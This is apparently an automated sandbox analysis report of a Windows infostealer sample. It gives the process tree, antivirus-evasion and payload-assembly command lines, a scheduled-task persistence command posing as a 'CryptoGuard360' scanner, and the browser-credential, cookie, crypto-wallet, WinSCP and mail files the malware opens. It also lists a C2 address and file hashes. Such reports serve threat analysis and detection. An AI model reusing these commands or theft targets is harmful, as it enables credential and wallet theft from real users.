                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.com | Code function: 28_2_0078EC6C mouse_event,28_2_0078EC6C
                  Source: C:\Users\user\Desktop\00000123.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
                  Source: C:\Users\user\Desktop\00000123.exe | Process created: C:\Users\user\AppData\Local\Temp\update.exe "C:\Users\user\AppData\Local\Temp\update.exe"
                  Source: C:\Users\user\Desktop\00000123.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                  Source: C:\Users\user\Desktop\00000123.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
                  Source: C:\Users\user\AppData\Local\Temp\update.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Expensive.pps Expensive.pps.bat & Expensive.pps.bat
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\expand.exe expand Expensive.pps Expensive.pps.bat
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 611485
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Experts.pps
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Gd" Investigations
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 611485\Heroes.com + Closely + Sad + Sandwich + Legends + Labor + Mailing + Jersey + Dies + Disabled + Technical 611485\Heroes.com
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Utilize.pps + ..\Expenditure.pps + ..\Hacker.pps + ..\Sexually.pps + ..\Forbes.pps + ..\Taught.pps + ..\Champion.pps + ..\Eclipse.pps + ..\Plants.pps + ..\Ed.pps + ..\Midnight.pps H
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\611485\Heroes.com Heroes.com H
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.com | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.com | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Persian" /tr "wscript //B 'C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
                  Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.com "C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.com" "C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\U"
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.com | Code function: 28_2_007814AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,28_2_007814AE
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.com | Code function: 28_2_00781FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,28_2_00781FB0
                  Source: Heroes.com, 00000013.00000003.2380255265.0000000003881000.00000004.00000800.00020000.00000000.sdmp, Heroes.com, 00000013.00000000.2365924382.0000000000523000.00000002.00000001.01000000.0000000A.sdmp, GuardianCryptoScan360.com, 0000001C.00000000.2423457527.00000000007E3000.00000002.00000001.01000000.0000000C.sdmp | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                  Source: GuardianCryptoScan360.com | Binary or memory string: Shell_TrayWnd
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.com | Code function: 28_2_00740A08 cpuid 28_2_00740A08
                  Source: C:\Users\user\Desktop\00000123.exe | Queries volume information: C:\Users\user\Desktop\00000123.exe VolumeInformation
                  Source: C:\Users\user\Desktop\00000123.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\Desktop\00000123.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.com | Code function: 28_2_0077E5F4 GetLocalTime,28_2_0077E5F4
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.com | Code function: 28_2_0077E652 GetUserNameW,28_2_0077E652
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.com | Code function: 28_2_0075BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,28_2_0075BCD2
                  Source: C:\Users\user\AppData\Local\Temp\update.exe | Code function: 6_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,6_2_00406805
                  Source: C:\Users\user\Desktop\00000123.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                  Stealing of Sensitive Information

                  Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 7400, type: MEMORYSTR
                  Source: MSBuild.exe, 00000025.00000002.2833990069.000000000361C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Electrumk
                  Source: MSBuild.exe, 00000025.00000002.2833990069.000000000361C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: ElectronCash
                  Source: MSBuild.exe, 00000025.00000002.2833990069.000000000361C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Jaxx Liberty!
                  Source: MSBuild.exe, 00000025.00000002.2833990069.00000000037A7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: $]q4C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                  Source: MSBuild.exe, 00000025.00000002.2833990069.000000000361C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: ElectrumLTC
                  Source: MSBuild.exe, 00000025.00000002.2833990069.00000000037A7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: $]q1C:\Users\user\AppData\Roaming\Ethereum\keystore
                  Source: MSBuild.exe, 00000025.00000002.2833990069.000000000361C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Exodus
                  Source: MSBuild.exe, 00000025.00000002.2833990069.00000000037A7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: $]q=C:\Users\user\AppData\Roaming\Binance\Local Storage\leveldb
                  Source: MSBuild.exe, 00000025.00000002.2833990069.000000000361C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Ethereum
                  Source: MSBuild.exe, 00000025.00000002.2833990069.00000000037A7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: `,]q6C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                  Source: InstallUtil.exe, 0000001D.00000002.3386046189.000000000440D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: set_UseMachineKeyStore
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: GuardianCryptoScan360.com | Binary or memory string: WIN_81
                  Source: GuardianCryptoScan360.com | Binary or memory string: WIN_XP
                  Source: GuardianCryptoScan360.com | Binary or memory string: WIN_XPe
                  Source: GuardianCryptoScan360.com | Binary or memory string: WIN_VISTA
                  Source: GuardianCryptoScan360.com | Binary or memory string: WIN_7
                  Source: GuardianCryptoScan360.com | Binary or memory string: WIN_8
                  Source: Yara match | File source: 00000025.00000002.2833990069.000000000361C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000025.00000002.2833990069.00000000037A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000025.00000002.2833990069.0000000003478000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 7400, type: MEMORYSTR

                  Remote Access Functionality

                  Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 7400, type: MEMORYSTR
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.com | Code function: 28_2_007A2263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,28_2_007A2263
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.com | Code function: 28_2_007A1C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,28_2_007A1C61
                  Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                  Gather Victim Identity Information | 212 Scripting | 2 Valid Accounts | 41 Windows Management Instrumentation | 212 Scripting | 1 Exploitation for Privilege Escalation | 11 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 11 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
                  Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 2 Data from Local System | 12 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                  Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | 2 Valid Accounts | 2 Valid Accounts | 21 Obfuscated Files or Information | 1 Credentials in Registry | 3 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
                  Employee Names | Virtual Private Server | Local Accounts | Cron | 1 Scheduled Task/Job | 21 Access Token Manipulation | 21 Software Packing | NTDS | 48 System Information Discovery | Distributed Component Object Model | 21 Input Capture | 1 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                  Gather Victim Network Information | Server | Cloud Accounts | Launchd | 2 Registry Run Keys / Startup Folder | 212 Process Injection | 1 DLL Side-Loading | LSA Secrets | 161 Security Software Discovery | SSH | 4 Clipboard Data | 2 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                  Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 1 Scheduled Task/Job | 111 Masquerading | Cached Domain Credentials | 71 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                  DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | 2 Registry Run Keys / Startup Folder | 2 Valid Accounts | DCSync | 4 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                  Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 71 Virtualization/Sandbox Evasion | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                  Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 21 Access Token Manipulation | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                  IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 212 Process Injection | Network Sniffing | 1 System Network Configuration Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                  Behavior Graph ID: 1628000 Sample: 00000123.pif Startdate: 03/03/2025 Architecture: WINDOWS Score: 100
                  2 -> 83: kurNPdkiGq.kurNPdkiGq
                  2 -> 85: 78.210.14.0.in-addr.arpa
                  2 -> 87: bg.microsoft.map.fastly.net
                  2 -> 91: Multi AV Scanner detection for submitted file
                  2 -> 93: Yara detected Generic Stealer
                  2 -> 95: Yara detected Discord Token Stealer
                  2 -> 97: 13 other signatures
                  2 -> 11: 00000123.exe 6 (started)
                  2 -> 15: wscript.exe (started)
                  2 -> 17: wscript.exe (started)
                  11 -> 69: C:\Users\user\AppData\Roaming\...\updatte.vbs, ASCII (dropped)
                  11 -> 71: C:\Users\user\AppData\Roaming\updatte.exe, PE32 (dropped)
                  11 -> 73: C:\Users\user\AppData\Local\Temp\update.exe, PE32 (dropped)
                  11 -> 115: Drops VBS files to the startup folder
                  11 -> 117: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  11 -> 119: Drops large PE files
                  11 -> 19: update.exe 24 (started)
                  11 -> 21: cmd.exe 1 (started)
                  11 -> 24: InstallUtil.exe (started)
                  11 -> 26: cmd.exe (started)
                  15 -> 121: Windows Scripting host queries suspicious COM object (likely to drop second stage)
                  17 -> 28: GuardianCryptoScan360.com (started)
                  19 -> 30: cmd.exe 2 (started)
                  21 -> 99: Drops PE files with a suspicious file extension
                  21 -> 101: Uses schtasks.exe or at.exe to add and modify task schedules
                  21 -> 103: Uses ipconfig to lookup or modify the Windows network settings
                  21 -> 33: conhost.exe (started)
                  21 -> 35: ipconfig.exe 1 (started)
                  24 -> 105: Found many strings related to Crypto-Wallets (likely being stolen)
                  24 -> 37: WerFault.exe (started)
                  26 -> 39: conhost.exe (started)
                  26 -> 41: ipconfig.exe (started)
                  30 -> 81: C:\Users\user\AppData\Local\...\Heroes.com, PE32 (dropped)
                  30 -> 43: Heroes.com 4 (started)
                  30 -> 47: cmd.exe 2 (started)
                  30 -> 49: cmd.exe 1 (started)
                  30 -> 51: 10 other processes
                  43 -> 75: C:\Users\user\...\GuardianCryptoScan360.com, PE32 (dropped)
                  43 -> 77: C:\Users\user\...\GuardianCryptoScan360.js, ASCII (dropped)
                  43 -> 123: Drops PE files with a suspicious file extension
                  43 -> 125: Writes to foreign memory regions
                  43 -> 127: Injects a PE file into a foreign processes
                  43 -> 53: MSBuild.exe (started)
                  43 -> 57: cmd.exe (started)
                  43 -> 59: schtasks.exe (started)
                  43 -> 61: MSBuild.exe (started)
                  47 -> 79: C:\Users\user\AppData\Local\Temp\611485\H, data (dropped)
                  53 -> 89: 51.81.129.243, 49974, 49975, 7702 OVHFR United States
                  53 -> 107: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                  53 -> 109: Tries to steal Mail credentials (via file / registry access)
                  53 -> 111: Found many strings related to Crypto-Wallets (likely being stolen)
                  53 -> 113: 2 other signatures
                  57 -> 63: conhost.exe (started)
                  57 -> 65: schtasks.exe (started)
                  59 -> 67: conhost.exe (started)

                  Source | Detection | Scanner | Label | Link
                  00000123.exe | 24% | ReversingLabs | Win32.Trojan.CrypterX |
                  Source | Detection | Scanner | Label | Link
                  C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.com | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\611485\Heroes.com | 0% | ReversingLabs | |
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  Name | IP | Active | Malicious | Antivirus Detection | Reputation
                  bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | | high
                  s-part-0032.t-0009.t-msedge.net | 13.107.246.60 | true | false | | high
                  kurNPdkiGq.kurNPdkiGq | unknown | unknown | true | | unknown
                  78.210.14.0.in-addr.arpa | unknown | unknown | true | | unknown
                                                                                  IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                                                                  51.81.129.243 | unknown | United States | | 16276 | OVHFR | false
                                                                                  Joe Sandbox version:42.0.0 Malachite
                                                                                  Analysis ID:1628000
                                                                                  Start date and time:2025-03-03 13:24:24 +01:00
                                                                                  Joe Sandbox product:CloudBasic
                                                                                  Overall analysis duration:0h 10m 8s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Cookbook file name:default.jbs
                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                  Number of analysed new started processes analysed:39
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:0
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Sample name:00000123.exe
                                                                                  (renamed file extension from pif to exe)
                                                                                  Original Sample Name:00000123.pif
                                                                                  Detection:MAL
                                                                                  Classification:mal100.troj.spyw.expl.evad.winEXE@60/35@2/1
                                                                                  EGA Information:
                                                                                  • Successful, ratio: 60%
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 92%
                                                                                  • Number of executed functions: 306
                                                                                  • Number of non-executed functions: 125
                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                  • Excluded IPs from analysis (whitelisted): 184.30.131.245, 199.232.214.172, 4.175.87.197, 13.95.31.18, 52.165.164.15, 13.107.246.60
                                                                                  • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, slscr.update.microsoft.com, otelrules.afd.azureedge.net, e3913.cd.akamaiedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, cac-ocsp.digicert.com.edgekey.net, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, azureedge-t-prod.trafficmanager.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                                  • Execution Graph export aborted for target 00000123.exe, PID 7248 because it is empty
                                                                                  • Execution Graph export aborted for target InstallUtil.exe, PID 1396 because it is empty
                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                  • Report size getting too big, too many NtWriteVirtualMemory calls found.
Time | Type | Description
07:25:51 | API Interceptor | 1x Sleep call for process: Heroes.com modified
07:26:30 | API Interceptor | 33x Sleep call for process: MSBuild.exe modified
13:25:43 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\updatte.vbs
13:25:53 | Task Scheduler | Run new task: GuardianCryptoScan360 path: wscript s>//B "C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.js"
                                                                                  No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
s-part-0032.t-0009.t-msedge.net | https://sharedpdf.zoholandingpage.com/pdfdocs | malicious | HTMLPhisher | 13.107.246.60
 | door.bat | malicious | Unknown | 13.107.246.60
 | QBTRN_COMP_Dvsa)_.svg | malicious | HTMLPhisher | 13.107.246.60
 | Factuur.pdf | malicious | Unknown | 13.107.246.60
 | email.eml | malicious | Unknown | 13.107.246.60
 | https://send.cm/jqisx6yw5pp3 | malicious | Unknown | 13.107.246.60
 | http://www.stage.coopervisionpro.co.il | malicious | Unknown | 13.107.246.60
 | POETDB24-25815.xla.xlsx | malicious | Unknown | 13.107.246.60
 | POETDB24-25815.xla.xlsx | malicious | Unknown | 13.107.246.60
 | DHL INVOICE No. 65419085.bat.exe | malicious | AgentTesla | 13.107.246.60
bg.microsoft.map.fastly.net | DE 34212 MELSUNGE.docx | malicious | Unknown | 199.232.210.172
 | 3s7NimtKaN.bat | malicious | Unknown | 199.232.214.172
 | door.bat | malicious | Unknown | 199.232.210.172
 | Factuur.pdf | malicious | Unknown | 199.232.210.172
 | https://send.cm/jqisx6yw5pp3 | malicious | Unknown | 199.232.214.172
 | Monetary_policy_report_2025_february.docx | malicious | Sidewinder | 199.232.214.172
 | POETDB24-25815.xla.xlsx | malicious | Unknown | 199.232.210.172
 | PO-55068 AE.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 199.232.210.172
 | MasonRootkit.exe | malicious | XWorm | 199.232.210.172
 | DataAnalyzer.xls | malicious | Unknown | 199.232.210.172
Match | Associated Sample Name / URL | Detection | Threat Name | Context
OVHFR | getscreen-799952897-x86.exe | malicious | Unknown | 51.89.95.37
 | getscreen-799952897-x86.exe | malicious | Unknown | 51.89.95.37
 | Payment_Activity_0079_2025-2-23.vbs | malicious | Unknown | 51.222.241.106
 | getscreen-226997704-x86.exe | malicious | Unknown | 51.89.95.37
 | Update.Client.exe | malicious | ScreenConnect Tool | 51.79.171.167
 | Update.Client.exe | malicious | ScreenConnect Tool | 51.79.171.167
 | owari.mpsl.elf | malicious | Unknown | 178.32.95.239
 | ggetokken.bat | malicious | Unknown | 142.44.215.161
 | ApexLoader.exe | malicious | Unknown | 51.89.7.33
 | ApexLoader.exe | malicious | Unknown | 51.89.7.33
                                                                                  No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.com | Setup.exe | malicious | LummaC Stealer |
 | 9FB5#U007e1.EXE.exe | malicious | LummaC Stealer |
 | wanscam software ocx setup download.exe | malicious | LummaC Stealer |
 | wanscam software ocx setup download.exe | malicious | Unknown |
 | #Ud835#Udc12#Ud835#Udc1e#Ud835#Udc2d#Ud835#Udc2e#Ud835#Udc29.exe | malicious | LummaC Stealer |
 | #Ud835#Udde6#Ud835#Uddf2#Ud835#Ude01#Ud835#Ude02#Ud835#Uddfd.exe | malicious | LummaC Stealer |
 | #Ud835#Udc12#Ud835#Udc1e#Ud835#Udc2d#Ud835#Udc2e#Ud835#Udc29.exe | malicious | LummaC Stealer |
 | Setup.exe | malicious | LummaC Stealer |
 | #Ud835#Udc12#Ud835#Udc1e#Ud835#Udc2d#Ud835#Udc2e#Ud835#Udc29.exe | malicious | LummaC Stealer |
 | #Ud835#Udde6#Ud835#Uddf2#Ud835#Ude01#Ud835#Ude02#Ud835#Uddfd.exe | malicious | LummaC Stealer |
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\611485\Heroes.com
                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):947288
                                                                                                      Entropy (8bit):6.630612696399572
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                                      MD5:62D09F076E6E0240548C2F837536A46A
                                                                                                      SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                                      SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                                      SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Joe Sandbox View:
                                                                                                      • Filename: Setup.exe, Detection: malicious, Browse
